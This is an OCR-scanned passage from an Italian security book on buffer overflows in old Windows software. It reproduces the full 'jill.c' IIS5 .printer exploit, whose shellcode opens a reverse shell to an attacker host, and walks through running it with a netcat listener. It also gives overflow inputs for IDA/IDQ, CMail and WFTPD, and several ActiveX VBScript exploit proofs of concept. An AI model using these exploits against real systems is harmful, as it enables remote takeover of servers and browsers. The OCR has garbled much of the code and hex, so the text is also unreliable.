EAWINNT \Systern32\inetsrv\httpodb. . . 


□ PTIONS. 


.idq 


E:\WINNT\SiJstem32\idq.dll 


GET,HEA. 


. New 


EAWINNT \M icrosoft. NET VFramework. . . 


GET,HEA. 


■ Pi 


C:\Perl\bin\Perl.exe "Zs" Zs 


GET,HEA. 


.plx 


C:\Perl\bin\PerllS.dll 


GET,HEA. 


.printer 


E:\WIN NT \System32Ww3prt. dll 


GETPOS" I 


.rem 


EAWINNT \M icrosoft. NET VFramework. . . 


GETPEA. 


.resources 


EAWINNT \M icrosoft. NET VFramework. . . 


GETPEA. 


.resx 


EAWINNT \M icrosoft. NET VFramework. . . 


G ET, HE A— ' 


.shtnn 
.shtnnl 


E:\WINNT \Si)stem32\inetsrv\ssinc. dll 
E:\WINNT \Si)stem32\inetsrv\ssinc. dll 

F A Wl M M T \ M ir ino ni t M F T \ Fr^, m^inrk 


GETPOS" 
GETPOS" , 

RF| HFùpJ 







Add Edit Rennove 



La DLL che aveva il problema era 
x:\winnt\system32\msw3prt.dll 
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Se aprivamo con telnet o con netcat una comunicazione con il server WEB mediante : 

telnet host 80 

e digitavamo : 

GET /NULL.printer http/1.0 
Host: [buffer di 420 bytes] 

Allora causavamo un buffer overflow che obbligava inetinfo.exe a ripartire dopo un crash. 
L'exploit relativo a questo bug è il seguente. 

/* US 5 remote .printer overflow. "jill.c" (don't ask) . 
* 

* by: dark spyrit <dspyrit@beavuh . org> 
* 

* respect to eeye for finding this one — nice work. 

* shouts to halvar, neofight and the beavuh bitchez . 
* 

* this exploit overwrites an exception frame to control eip and get to 

* our code. . the code then locates the pointer to our larger buffer and 

* execs . 
* 

* usage: jill <victim host> <victim port> <attacker host> <attacker port> 
* 

* the shellcode spawns a reverse cmd shell . . so you need to set up a 

* netcat listener on the host you control . 
* 

* Ex: ne —1 —p <attacker port> —w 
* 

* I haven't slept in years. 
*/ 

iinclude <sys/types . h> 
iinclude <sys/time . h> 
iinclude <sys/socket . h> 
iinclude <netinet/in . h> 
iinclude <arpa/inet . h> 
iinclude <unistd.h> 
iinclude <errno.h> 
iinclude <stdlib.h> 
iinclude <stdio.h> 
iinclude <string.h> 
iinclude <fcntl.h> 
iinclude <netdb.h> 

int main(int arge, char *argv[]){ 

/* the whole request rolled into one, pretty huh? carez. */ 

unsigned char sploit[] = 

"\x47\x45\x54\x20 \x2f\x4e \x55 \x4c\x4c\x2e \x70\x72\x69\x6e\x74\x65\x72\x20" 
" \x48\x54 \x54 \x50 \x2f\x31 \x2e \x30 \x0d\x0a \x42 \x65 \x61 \x76\x75 \x68 \x3a \x20 " 
« \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 « 
" \x90 \x90 \xeb\x03 \x5d\xeb\x05 \xe8 \xf8 \xff\xff\xff\x83 \xc5 \xl5\x90 \x90 \x90 " 
« \x8b\xc5 \x33 \xc9\x66\xb9\xd7\x02 \x50\x80\x30 \x95 \x40\xe2 \xfa \x2d\x95 \x95 " 
"\x64\xe2\xl4\xad\xd8\xcf\x05\x95\xel\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95 " 
"\xc8\xle\x40\xl4\x7f\x9a\x6b\x6a\x6a\xle\x4d\xle\xe6\xa9\x96\x66\xle\xe3" 
"\xed\x96\x66\xle\xeb\xb5\x96\x6e\xle\xdb\x81\xa6\x78\xc3\xc2\xc4\xle\xaa " 
"\x96\x6e\xle \x67\x2c\x9b\x95 \x95 \x95 \x66\x33 \xel \x9d\xcc\xca \xl6\x52 \x91 " 
"\xd0\x77\x72\xcc\xca\xcb\xle\x58\xle\xd3\xbl\x96\x56\x44\x74\x96\x54\xa6" 
"\x5c\xf3\xle\x9d\xle\xd3\x89\x96\x56\x54\x74\x97\x96\x54\xle\x95\x96\x56" 
"\xle\x67\xle\x6b\xle\x45 \x2c\x9e \x95 \x95 \x95 \x7d\xel \x94 \x95 \x95 \xa6\x55 " 
"\x39\xl0\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\xle\x4d\x2c\x93\x95\x95\x95 " 
« \x7d\xce \x94 \x95 \x95 \x52 \xd2 \xfl \x99\x95 \x95 \x95 \x52 \xd2 \xfd\x95 \x95 \x95 " 
" \x95 \x52 \xd2 \xf9\x94 \x95 \x95 \x95 \xff\x95 \xl 8 \xd2 \xfl \xc5 \xl 8 \xd2 \x85 \xc5 " 
"\xl8 \xd2 \x81 \xc5 \x6a \xc2 \x55 \xff\x95 \xl 8 \xd2 \xfl \xc5 \xl 8 \xd2 \x8d\xc5 \xl8" 
" \xd2 \x89\xc5 \x6a \xc2 \x55 \x52 \xd2 \xb5 \xdl \x95 \x95 \x95 \xl 8 \xd2 \xb5 \xc5 \x6a" 
"\xc2\x51\xle\xd2\x85\xlc\xd2\xc9\xlc\xd2\xf5\xle\xd2\x89\xlc\xd2\xcd\xl4" 
« \xda \xd9\x94 \x94 \x95 \x95 \xf3 \x52 \xd2 \xc5 \x95 \x95 \xl 8 \xd2 \xe5 \xc5 \xl 8 \xd2 « 
" \xb5 \xc5 \xa6\x55 \xc5 \xc5 \xc5 \xff\x94 \xc5 \xc5 \x7d\x95 \x95 \x95 \x95 \xc8 \xl4" 
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"\x89\x6a \xc2 \x71 \xfd\x95 \x91 \x95 \x95 \xff\xd5 \x6a \xc2 \x45\xle \x7d\xc5 \xfd " 
" \x94 \x94 \x95 \x95 \x6a \xc2 \x7d\xl0 \x55 \x9a \xl 0 \x3f\x95 \x95 \x95 \xa6\x55 \xc5 " 
" \xd5 \xc5 \xd5 \xc5 \x6a \xc2 \x79\xl6\x6d\x6a \x9a \xll \x02 \x95 \x95 \x95 \xle \x4d « 
" \xf3 \x52 \x92 \x97\x95 \xf3 \x52 \xd2 \x97\x8e \xac\x52 \xd2 \x91 \x5e \x38 \x4c\xb3 " 
"\xff\x85\xl8\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3 " 
" \xc4 \xc4 \xc4 \x6a \xe2 \x81 \x6a \xc2 \x59\xl0 \x55 \xel \xf5 \x05 \x05 \x05 \x05 \xl5" 
« \xab\x95 \xel \xba \x05 \x05 \x05 \x05 \xff\x95 \xc3 \xfd\x95 \x91 \x95 \x95 \xcO \x6a" 
" \xe2 \x81 \x6a \xc2 \x4d\xl 0 \x55 \xel \xd5 \x05 \x05 \x05 \x05 \xff\x95 \x6a\xa3 \xcO " 
"\xc6\x6a\xc2\x6d\xl6\x6d\x6a\xel\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd" 
" \x95 \x91 \x95 \x95 \xcO \xc6\x6a \xc2 \x69\xl0 \x55 \xe9\x8d\x05 \x05 \x05 \x05 \xel « 
" \x09\xff\x95 \xc3 \xc5 \xcO \x6a \xe2 \x8d\x6a \xc2 \x41 \xff\xa 7\x6a \xc2 \x49\x7e" 
"\xlf\xc6\x6a \xc2 \x65 \xff\x95 \x6a \xc2 \x75 \xa6\x55 \x39\xl0 \x55 \xeO \x6c\xc4 « 
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xel\xc5\xe7\xfa\xf6" 
"\xd4\xfl\xfl\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xfl\xd9\xfc\xf7\xe7\xf4\xe7" 
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xel\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xel\xc6" 
"\xel\xf4\xe7\xel\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xel\xf0" 
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xfl" 
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2" 
"\xe7\xfc\xel\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xfl\xd3\xfc\xf9\xf0\x95 " 
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xel\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95 " 
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xfl\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6" 
"\xa7\x95\xc2\xc6\xd4\xc6\xel\xf4\xe7\xel\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0" 
"\xel\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xel\x95\xf6\xfa\xfb\xfb" 
"\xf0\xf6\xel\x95\xe6\xf0\xfb\xfl\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xfl\xbb" 
« \xfO \xed\xfO \x95 \xOd\xOa \x48\x6f\x73 \x74 \x3a \x20 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 » 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x33 " 
" \xcO \xbO \x90 \x03 \xd8 \x8b\x03 \x8b\x40\x60 \x33 \xdb\xb3 \x24 \x03 \xc3 \xff\xeO " 
" \xeb\xb9\x90 \x90 \x05 \x31 \x8c\x6a \xOd\xOa \xOd\xOa "; 

int s; 

unsigned short int a __port; 
unsigned long a__host; 
struct hostent *ht; 
struct sockaddr_in sin; 

printf("iis5 remote .printer overflow.\n" 

"dark spyrit <dspyrit@beavuh . org> / beavuh labs .\n") ; 

if (argo != 5) { 

printf ( "usage : %s <victimHost> <victimPort> <attackerHost> 

<attackerPort>\n" , argv[0] ) ; 
exit (1) ; 

} 

if ( (ht = gethostbyname (argv[l] ) ) == 0) { 
herror (argv[ 1] ) ; 
exit (1) ; 

} 

sin. sin port = htons (atoi (argv[2] ) ) ; 
a _port = htons (atoi (argv[4] )) ; 
a _port*=0x9595; 

sin . sin_family = AF_INET; 

sin.sin addr = *( (struct in__addr *)ht—>h__addr) ; 



if ((ht = gethostbyname (argv [3] ) ) == 0) { 
herror (argv[ 3] ) ; 
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a__host = * ( (unsigned long *) ht->h_addr) ; 
a_host ^=0x95959595; 

splo±t[441]= (a_port) & Oxff; 
sploit [442]= (a_port » 8) & Oxff; 

splo±t[446]= (a__host) & Oxff; 
sploit[447]= (a_host » 8) & Oxff; 
splolt[448]= (a_host » 16) S Oxff; 
splolt[449]= (a_host » 24) & Oxff; 

if ((s = socket (AF_INET, SOCK^STREAM, 0) ) ==-!){ 
perror ( "socket ") ; 
exit (1) ; 

} 

printf ("\nconnecting . . . \n") ; 

if ( (connect (s, (struct sockaddr *) &sin, sizeof (sin) ) ) == -1) { 
perror ( "connect ") ; 
exit (1) ; 

} 

writefs, sploit, strlen (sploit) ) ; 
sleep (1) ; 
dose (s) ; 

printf ("sent .. . \nyou may need to send a carriage on your listener if the shell 
doesn 't appear. \nhave fun ! \n ") ; 
exit (0) ; 

Dopo aver compilato con Cgwin l'exploit utilizziamo netcat per eseguire il listening sul sistema 
attaccante. 

C: \> ne -w -1 -p 2002 

Ora lanciamo JILL usando la stessa porta settata su netcat. 

C:\> jill 192.168.255.123 80 192.168.200.22 2002 

Iis5 remote .printer overflow. 

Dark spyrit dspyrit@beavuh.org / beavuh labs . 

Connecting... . 
Sent... . 

You may need to sende a carriage on your listener if the shell 




Se tutto va come sperato dopo qualche istante apparirà un shell remota. 

Precedentemente, nel capitolo relativo ai WEB Server, avevamo visto il BUG legato ai file 

IDQ e IDA. 

In pratica questo bugs permetteva specificando da browser il nome di un file con queste 
estensioni non esistente di avere come risposta il percorso di sistema di dove si trovava la 
radice del web. 

Legate alle DLL di gestione di questi files esiste un altro problema legato ai buffer overflow. 

Questo problema è quello che il WORM CODE RED ha utilizzato per eseguire l'exploit. 

Il buffer overflow è simile a quello appena visto nelle pagine precedenti. 

Sempre nello stesso modo, con telnet o netcat, è possibile aprire una connessione con il 

WEB Server della vittima utilizzante MS. 

Quindi : 



A connessione avvenuta si deve digitare : 
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GET /null.ida?[buffer di 240 bytes]=X HTTP/1 .1 
Host: [valore arbitrario] 

Buffer è un array di almeno 240 bytes il quale viene passato alla DLL di gestione idq.dll o 
ida.dll. 

Un altro caso di sicurezza legato ai buffer overflow è stato segnalato per quello che riguarda 
un usatissimo mail server e precisamente CMail SMTP Server. 

Il mail server sopra citato consente un attacco di tipo buffer overflow da remoto. 
Il meccanismo è quello consueto: l'invio di una stringa di grandi dimensioni come argomento 
di un comando SMTP; in particolare, l'invio di una stringa di circa 7090 caratteri come 
username del mittente di posta, come qui sotto riportato. 

$ telnet example.com 25 
Trying example.com. . . 
Connected to example.com. 
Escape character Is '*] ' . 

220 SMTP services ready. Computalynx CMail Server Version: 2.4 
helo nome 

250 Hello nome [indirizzo IP del mittente] , how are you today 



dove in [buffer] si sostituisca la stringa di grandi dimensioni. 

Il problema era presente già nella versione 2.3 del server, ma non è stato risolto. 

A questo punto vediamo un buffer overflow legato ad un altrettanto usato FTP Server e 

precisamente WFTPD. 

Il server FTP WFTPD, nelle versioni 2.34 e 2.40 (nonché nelle versioni precedenti), può 
essere attaccato con successo da remoto, con un attacco di tipo buffer overflow, inviando sue 
stringhe di grandi dimensioni in argomento a comandi MKD e CWD, come di seguito indicato. 

Primo comando : 
MKD 

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 

Secondo comando: 
CWD 

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 



Il problema affligge il server sia sotto Win 9x che sotto Windows NT. 

Uno degli ultimissimi casi venuti fuori è relativo a SQL Server sia per quanto riguarda la 

versione 7.0 che la versione 2000. 

SQL Server permette la connessione da remoto alla sorgente dati. 

Una delle possibilità di questa potenzialità è quella di permettere la creazione di connessioni 
"ad hoc" verso una sorgente di dati remota senza dover settare un server collegato. 
Questo è possibile grazie a OLE DB provider il quale è appunto un data source provider di 
alto livello. 

La potenzialità è disponibile invocando direttamente il provider OLE DB attraverso il nome 
usato per connettersi a una sorgente di dati remota. 

In questo meccanismo esiste un buffer non controllato il quale potrebbe causare un errore 
nell'esecuzione del servizio SQL Server. 

Questo sistema di database può essere configurato per funzionare in contesti di sicurezza 
differenti e di fatto il risultato di un buffer overflow dipende da questo. 
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Un eventuale attaccante può sfruttare eseguire un exploits di questa vulnerabilità seguendo 
due vie. 

Esso può cercare di leggere ed eseguire una query del database che richiama una delle 
funzioni affette. 

Al contrario se il sito WEB o qualsiasi altro front end al database fosse configurato per 
accedere o processare query arbitrarie sarebbe possibile per un attaccante causare che la 
query chiami una delle funzioni in questione con i parametri errati. 



Buffer overf low in applicazioni W indows 

Alcune applicazioni, anche molto diffuse, consentono a un attaccante la realizzazione di 
attacchi di tipo buffer overflow in maniera relativamente semplice. L'attacco è possibile 
sfruttando metodi ben noti e facilmente manipolabili per la sovrascrittura dell'indirizzo di 
ritorno da una chiamata a procedura nello stack. 

Come già segnalato, il problema di base risiede nell'insieme di architetture 
ActiveX/OLE/COM/DCOM: in nessuna di essevengono normalmente effettuati controlli sulla 
dimensione dei buffer di dati in transito durante una chiamata a metodo, il che consente, 
volontariamente o meno, la sovrascrittura dell'indirizzo di ritorno. 
Segue l'elenco delle applicazioni segnalate. 



1 . Acrobat Control for ActiveX (file PDF.OCX), versione 1 .3.1 88 

2. Setupctl 1 .0 Type Library (file SETUPCTL.DLL), versione 1 .1 .0.6 

3. Eyedog OLE Control Module (file EYEDOG.OCX), versione 1 .1 .1 .75 

4. MSN ActiveX Setup BBS Control (file SETUPBBS.OCX), versione 4.71 .0.1 0 

5. hhopen OLE Control Module (file HHOPEN.OCX), versione 1 .0.0.1 

6. RegWizCtrl 1 .0 Type Library (file REGWIZC.DLL), versione 3.0.0.0 



Sono stati presentati da Shane Hird degli esempi di codice per effettuare gli attacchi: per tutti 
gli esempi presentati, l'autore ha indicato a titolo di esempio il salto all'invocazione di 
ExitProcess, ma naturalmente il codice da eseguire può essere arbitrariamente scelto 
dall'attaccante. 

EyeDog 

<object classid="clsid:06A7EC63-4E21-1 1 D0-A1 12-00A0C90543AA" id="eye"x/object> 

<script language="vbscript"> 

<!- 

msgbox("EYEDOG OLE Control module Buffer Overrun (Locai Version)" + Chr(10) + "Written 
by Shane Hird") 

' Padding per l'attacco 
expstr = 

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAA" 

' indirizzo per la RET: ExitProcess, BFF8D4CA 

expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191) 

' Chiamata al metodo attaccato, MSInfoLoadFile 
eye.MSInfoLoadFile(expstr) 

-></script> 

HHopen 
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<object classid="clsid:1 30D7743-5F5A-1 1 D1 -B676-00A0C9697233" 
id="hhopen"x/OBJECT> 

<script language="vbscript"x!--msgbox("hhopen OLE Control Module Buffer Overrun" + 
Chr(10) + "Written ByShane Hird") 

expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAA" 

' al posto del corretto indirizzo per l'istruzione RET, 
' si punta a ExitProcess, mediante BFF8D4CA. 

expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191) 

' Pad extra per realizzare la sovrascritturaexpstr = expstr + 

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 

' Chiamata al metodo attaccato, passando come parametro un normale file di help 

hhopen.OpenHelp "Winhlp32.hlp", expstr--> 

</script> 

SETUPBBS 

<object classid="clsid:8F0F5093-0A70-1 1 D0-BCA9-00C04FD85AA6" 
id="setupbbs"x/OBJECT> 

<script language="vbscript"x!-msgbox("MSN Setup BBS Buffer Overrun" + Chr(10) + 
"Written by Shane Hird") 

expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 
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' RET address (ExitProcess BFF8D4CA) 

expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191) 

' È possibile realizzare l'attacco con una qualunque delle due chiamate 

' setupbbs.vAddNewsServer expstr, true setupbbs.blsNewsServerConfigured expstr 

-></script> 

PDF 

L'indirizzo cui viene rediretto li comando RET consiste in questo caso di una JMP ESP per il 
lanciodiCALC.EXE. 

Il suo valore quindi può essere differente nelle varie versioni di Windows; anche qui 
l'esecuzione di questo comando è puramente a titolo di esempio. 

<object classid="clsid:CA8A9780-280D-1 1CF-A24D-444553540000" id="pdf"x/object> 
<script language="VBscript"x!-msgbox("Adobe Acrobat OCX Buffer Overrun" + Chr(10) + 
"Written by Shane Hird") 

expstr 

="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAA" 

expstr = expstr + Chr(235) 'Indirizzo di JMP ESP nella SHELL32 di Win98 (7FD035EB) 
expstr = expstr + Chr(53) 
expstr = expstr + Chr(208) 
expstr = expstr + Chr(127) 

' con le NOP che seguono si "risistema" lo stack alle corrette dimensioni 
expstr = expstr + Chr(144) + Chr(144) + Chr(144) + Chr(144) + Chr(144) 

' MOV EDI, ESP 

expstr = expstr + Chr(139) + Chr(252) 

' ADD EDI, 19 (dimensione del codice) 

expstr = expstr + Chr(1 31 ) + Chr(1 99) + Chr(25) 

' PUSH EAX (Window Style EAX = 1 ) 
expstr = expstr + Chr(80) 

' PUSH EDI (Indirizzo della linea di comando) 
expstr = expstr + Chr(87) 

' MOV EDX, BFFA0960 (WinExec, Win98) 

expstr = expstr + Chr(1 86) + Chr(96) + Chr(9) + Chr(250) + Chr(1 91 ) 
' CALL EDX 

expstr = expstr + Chr(255) + Chr(21 0) 
' XOR EAX, EAX 

expstr = expstr + Chr(51 ) + Chr(1 92) 
' PUSH EAX 

expstr = expstr + Chr(80) 
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' MOV EDX, BFF8D4CA (ExitProcess, Win98) 

expstr = expstr + Chr(1 86) + Chr(202) + Chr(21 2) + Chr(248) + Chr(1 91 ) 
' CALL EDX 

expstr = expstr + Chr(255) + Chr(21 0) 

' Il comando è rimpiazzabile con qualsiasi altro, 

' seguito da uno zero (inserito automaticamente dal sistema) 

expstr = expstr + "CALC.EXE" 

' Chiamata al metodo da attaccare pdf.setview(expstr) 



SETUPCTL 

<object classid="clsid:F72A7B0E-0DD8-1 1 D1-BD6E-00AA00B92AF1" id = "setupctl"> 
</object> 

<script language="vbscript"x!--msgbox("Setupctl 1 .0 Type Library Buffer Overrun" + Chr(10) 
+ "WrittenbyShaneHird") 

expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 

expstr = expstr + Chr(235) 'Indirizzo di JMP ESP nella SHELL32 di Win98 (7FD035EB) 
expstr = expstr + Chr(53) 
expstr = expstr + Chr(208) 
expstr = expstr + Chr(127) 

' le NOP inserite sono utili per il debug 
expstr = expstr + Chr(144) 

' MOV EDI, ESP 

expstr = expstr + Chr(139) + Chr(252) 

' ADD EDI, 19h (Dimensione del codice) 
expstr = expstr + Chr(1 31 ) + Chr(1 99) + Chr(25) 

' PUSH EAX (Window Style EAX = 41 41 41 41 ) 
